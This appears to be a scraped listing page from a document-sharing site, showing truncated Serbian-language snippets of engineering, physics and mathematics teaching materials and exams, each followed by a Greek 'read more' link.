ДИЈАГРАМИ И ТАБЛИЦЕ ФАКУЛТЕТ ТЕХНИЧКИХ НАУКА ОДСЕК ЗА ПРОИЗВОДНО МАШИНСТВО ПРОЈЕКТОВАЊЕ ТЕХНОЛОГИЈЕ ТЕРМИЧКЕ ОБРАДЕ. Приредио: Александар Милетић

ДИЈАГРАМИ И ТАБЛИЦЕ ФАКУЛТЕТ ТЕХНИЧКИХ НАУКА ОДСЕК ЗА ПРОИЗВОДНО МАШИНСТВО ПРОЈЕКТОВАЊЕ ТЕХНОЛОГИЈЕ ТЕРМИЧКЕ ОБРАДЕ. Приредио: Александар Милетић - ПТО ФАКУЛТЕТ ТЕХНИЧКИХ НАУКА ОДСЕК ЗА ПРОИЗВОДНО МАШИНСТВО ПРОЈЕКТОВАЊЕ ТЕХНОЛОГИЈЕ ТЕРМИЧКЕ ОБРАДЕ ДИЈАГРАМИ И ТАБЛИЦЕ Приредио: Александар Милетић 1 С т р а н а - ПТО Садржај Пренос топлоте... 3 Цементација...15

Διαβάστε περισσότερα

Реализована вежба на протоборду изгледа као на слици 1.

Реализована вежба на протоборду изгледа као на слици 1. Вежбе из електронике Вежба 1. Kондензатор три диоде везане паралелно Циљ вежбе је да ученици повежу струјно коло са три диоде везане паралелно од којих свака има свој отпорник. Вежба је успешно реализована

Διαβάστε περισσότερα

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ТЕСТ МАТЕМАТИКА

Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ТЕСТ МАТЕМАТИКА Република Србија МИНИСТАРСТВО ПРОСВЕТЕ, НАУКЕ И ТЕХНОЛОШКОГ РАЗВОЈА ЗАВОД ЗА ВРЕДНОВАЊЕ КВАЛИТЕТА ОБРАЗОВАЊА И ВАСПИТАЊА ТЕСТ МАТЕМАТИКА УПУТСТВО ЗА ОЦЕЊИВАЊЕ ОБАВЕЗНО ПРОЧИТАТИ ОПШТА УПУТСТВА 1. Сваки

Διαβάστε περισσότερα

Осцилације система са једним степеном слободе кретања

Осцилације система са једним степеном слободе кретања 03-ec-18 Осцилације система са једним степеном слободе кретања Опруга Принудна сила F(t) Вискозни пригушивач ( дампер ) 1 Принудна (пертурбациона) сила опруга Реституциона сила (сила еластичног отпора)

Διαβάστε περισσότερα

МЕХАНИЧКЕ ОСЦИЛАЦИЈЕ. Осиловање

МЕХАНИЧКЕ ОСЦИЛАЦИЈЕ. Осиловање МЕХАНИЧКЕ ОСЦИЛАЦИЈЕ Понедељак, 29. децембар, 2010 Хуков закон Период и фреквенција осциловања Просто хармонијско кретање Просто клатно Енергија простог хармонијског осцилатора Веза са униформним кретањем

Διαβάστε περισσότερα

Нивелмански инструмент (нивелир) - конструкција и саставни делови, испитивање и ректификација нивелира, мерење висинских разлика техничким нивелманом

Нивелмански инструмент (нивелир) - конструкција и саставни делови, испитивање и ректификација нивелира, мерење висинских разлика техничким нивелманом висинских техничким нивелманом Страна 1 Радна секција: 1.. 3. 4. 5. 6. Задатак 1. За нивелмански инструмент нивелир са компензатором серијски број испитати услове за мерење висинских : 1) Проверити правилност

Διαβάστε περισσότερα

КАТЕДРА ЗА ЕНЕРГЕТСКЕ ПРЕТВАРАЧЕ И ПОГОНЕ ЛАБОРАТОРИЈА ЗА ЕНЕРГЕТСКЕ ПРЕТВАРАЧЕ ЕНЕРГЕТСКИ ПРЕТВАРАЧИ 1

КАТЕДРА ЗА ЕНЕРГЕТСКЕ ПРЕТВАРАЧЕ И ПОГОНЕ ЛАБОРАТОРИЈА ЗА ЕНЕРГЕТСКЕ ПРЕТВАРАЧЕ ЕНЕРГЕТСКИ ПРЕТВАРАЧИ 1 КАТЕДРА ЗА ЕНЕРГЕТСКЕ ПРЕТВАРАЧЕ И ПОГОНЕ ЛАБОРАТОРИЈА ЗА ЕНЕРГЕТСКЕ ПРЕТВАРАЧЕ ЕНЕРГЕТСКИ ПРЕТВАРАЧИ 1 Лабораторијска вежба број 1 МОНОФАЗНИ ФАЗНИ РЕГУЛАТОР СА ОТПОРНИМ И ОТПОРНО-ИНДУКТИВНИМ ОПТЕРЕЋЕЊЕМ

Διαβάστε περισσότερα

Ротационо симетрична деформација средње површи ротационе љуске

Ротационо симетрична деформација средње површи ротационе љуске Ротационо симетрична деформација средње површи ротационе љуске слика. У свакој тачки посматране средње површи, у општем случају, постоје два компонентална померања: v - померање у правцу тангенте на меридијалну

Διαβάστε περισσότερα

РЕШЕНИ ЗАДАЦИ СА РАНИЈЕ ОДРЖАНИХ КЛАСИФИКАЦИОНИХ ИСПИТА

РЕШЕНИ ЗАДАЦИ СА РАНИЈЕ ОДРЖАНИХ КЛАСИФИКАЦИОНИХ ИСПИТА РЕШЕНИ ЗАДАЦИ СА РАНИЈЕ ОДРЖАНИХ КЛАСИФИКАЦИОНИХ ИСПИТА 006. Задатак. Одредити вредност израза: а) : за, и 69 0, ; б) 9 а) Како је за 0 и 0 дати израз идентички једнак изразу,, : : то је за дате вредности,

Διαβάστε περισσότερα

ТАЛАСИ У МАГНЕТОСФЕРАМА ПУЛСАРА

ТАЛАСИ У МАГНЕТОСФЕРАМА ПУЛСАРА ТАЛАСИ У МАГНЕТОСФЕРАМА ПУЛСАРА ПУЛСАРИ Настанак, структура и својства МАГНЕТОСФЕРА ПУЛСАРА Структура електромагнетног поља МАГНЕТОСТАТИЧКО ПОЉЕ ~ ~ МАГНЕТОСФЕРА ПУЛСАРА Структура електромагнетног поља

Διαβάστε περισσότερα

ТАНГЕНТА. *Кружница дели раван на две области, једну, спољашњу која је неограничена и унутрашњу која је ограничена(кружницом).

ТАНГЕНТА. *Кружница дели раван на две области, једну, спољашњу која је неограничена и унутрашњу која је ограничена(кружницом). СЕЧИЦА(СЕКАНТА) ЦЕНТАР ПОЛУПРЕЧНИК ТАНГЕНТА *КРУЖНИЦА ЈЕ затворена крива линија која има особину да су све њене тачке једнако удаљене од једне сталне тачке која се зове ЦЕНТАР КРУЖНИЦЕ. *Дуж(OA=r) која

Διαβάστε περισσότερα

Могућности и планови ЕПС на пољу напонско реактивне подршке. Излагач: Милан Ђорђевић, мастер.ел.тех.и рачунар. ЈП ЕПС Производња енергије

Могућности и планови ЕПС на пољу напонско реактивне подршке. Излагач: Милан Ђорђевић, мастер.ел.тех.и рачунар. ЈП ЕПС Производња енергије Могућности и планови ЕПС на пољу напонско реактивне подршке Излагач: Милан Ђорђевић, мастер.ел.тех.и рачунар. ЈП ЕПС Производња енергије 1 Обавезе ЈП ЕПС као КПС... ЗАКОН О ЕНЕРГЕТИЦИ ЧЛАН 94. Енергетски

Διαβάστε περισσότερα

4. Троугао. (II део) 4.1. Појам подударности. Основна правила подударности троуглова

4. Троугао. (II део) 4.1. Појам подударности. Основна правила подударности троуглова 4 Троугао (II део) Хилберт Давид, немачки математичар и логичар Велики углед у свету Хилберту је донело дело Основи геометрије (1899), у коме излаже еуклидску геометрију на аксиоматски начин Хилберт Давид

Διαβάστε περισσότερα

6.3. Паралелограми. Упознајмо још нека својства паралелограма: ABD BCD (УСУ), одакле је: а = c и b = d. Сл. 23

6.3. Паралелограми. Упознајмо још нека својства паралелограма: ABD BCD (УСУ), одакле је: а = c и b = d. Сл. 23 6.3. Паралелограми 27. 1) Нацртај паралелограм чији је један угао 120. 2) Израчунај остале углове тог четвороугла. 28. Дат је паралелограм (сл. 23), при чему је 0 < < 90 ; c и. c 4 2 β Сл. 23 1 3 Упознајмо

Διαβάστε περισσότερα

R 2. I област. 1. Реални напонски генератор електромоторне силе E. и реални напонски генератор непознате електромоторне силе E 2

R 2. I област. 1. Реални напонски генератор електромоторне силе E. и реални напонски генератор непознате електромоторне силе E 2 I област. Реални напонски генератор електромоторне силе = 0 V и унутрашње отпорности = Ω и реални напонски генератор непознате електромоторне силе и унутрашње отпорности = 0, 5 Ω везани су у коло као на

Διαβάστε περισσότερα

Писмени испит из Метода коначних елемената

Писмени испит из Метода коначних елемената Београд,.0.07.. За приказани билинеарни коначни елемент (Q8) одредити вектор чворног оптерећења услед задатог линијског оптерећења p. Користити природни координатни систем (ξ,η).. На слици је приказан

Διαβάστε περισσότερα

& 2. Брзина. (слика 3). Током кратког временског интервала Δt тачка пређе пут Δs и изврши елементарни (бесконачно мали) померај Δ r

& 2. Брзина. (слика 3). Током кратког временског интервала Δt тачка пређе пут Δs и изврши елементарни (бесконачно мали) померај Δ r &. Брзина Да би се окарактерисало кретање материјалне тачке уводи се векторска величина брзина, коју одређује како интензитет кретања тако и његов правац и смер у датом моменту времена. Претпоставимо да

Διαβάστε περισσότερα

Примена првог извода функције

Примена првог извода функције Примена првог извода функције 1. Одреди дужине страница два квадрата тако да њихов збир буде 14 а збир површина тих квадрата минималан. Ре: x + y = 14, P(x, y) = x + y, P(x) = x + 14 x, P (x) = 4x 8 Први

Διαβάστε περισσότερα

ПИТАЊА ЗА КОЛОКВИЈУМ ИЗ ОБНОВЉИВИХ ИЗВОРА ЕНЕРГИЈЕ

ПИТАЊА ЗА КОЛОКВИЈУМ ИЗ ОБНОВЉИВИХ ИЗВОРА ЕНЕРГИЈЕ ПИТАЊА ЗА КОЛОКВИЈУМ ИЗ ОБНОВЉИВИХ ИЗВОРА ЕНЕРГИЈЕ 1. Удео снаге и енергије ветра у производњи електричне енергије - стање и предвиђања у свету и Европи. 2. Навести називе најмање две међународне организације

Διαβάστε περισσότερα